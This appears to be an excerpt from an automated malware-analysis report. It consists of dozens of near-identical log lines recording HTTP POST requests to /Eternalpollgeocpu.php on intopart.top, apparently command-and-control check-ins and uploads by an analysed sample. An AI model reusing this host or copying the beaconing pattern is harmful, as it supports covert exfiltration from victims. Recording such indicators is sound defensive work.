Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1772Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 249068Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1788Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1076Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1772Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1788Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1760Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1788Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1076Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1788Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1788Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1788Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1076Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1788Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1076Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1076Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1788Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1788Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1076Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1760Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1076Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1076Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1788Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
